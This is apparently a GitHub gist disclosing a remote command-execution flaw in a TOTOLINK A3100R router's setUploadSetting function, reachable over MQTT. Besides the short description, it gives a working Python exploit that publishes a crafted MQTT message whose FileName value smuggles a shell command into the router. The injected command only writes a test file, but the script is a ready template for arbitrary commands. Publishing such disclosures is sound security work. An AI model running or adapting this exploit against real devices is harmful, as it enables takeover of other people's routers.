Skip to content

Instantly share code, notes, and snippets.

@Swind1er

Swind1er/setUploadSetting_RCE_Poc.md

Created May 20, 2024 13:01
Show Gist options
  • Save Swind1er/d1e9f3a538dab5f3833a964d1ec1155a to your computer and use it in GitHub Desktop.
Save Swind1er/d1e9f3a538dab5f3833a964d1ec1155a to your computer and use it in GitHub Desktop.
Download ZIP
Raw
setUploadSetting_RCE_Poc.md

setUploadSettingRCE

Poc

Firmware Version: A3100R_V4.1.2cu.5247_B20211129

You can download the firmware here: Swind1er/Download (github.com)

Vulnerability Proof of Concept Video:

https://github.com/Swind1er/Video/raw/main/A3100R_setUploadSetting_RCE%20poc.mp4

image-20240520194026820

In the cgi function setUploadSetting of the file /lib/cste_modules/upgrade.so, the string content of the user input field FileName is not filtered. Sending a malicious FileName field using the MQTT service leads to arbitrary command execution.

exp

import paho.mqtt.client as mqtt

client = mqtt.Client()
client.connect("192.168.138.128",1883,60)
client.publish('totolink/router/setting/setUploadSetting',
               payload='{"topicurl":"setting/setUploadSetting",\
                "FileName":";echo \'123\'>>/tmp/flag.txt;echo"}')
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment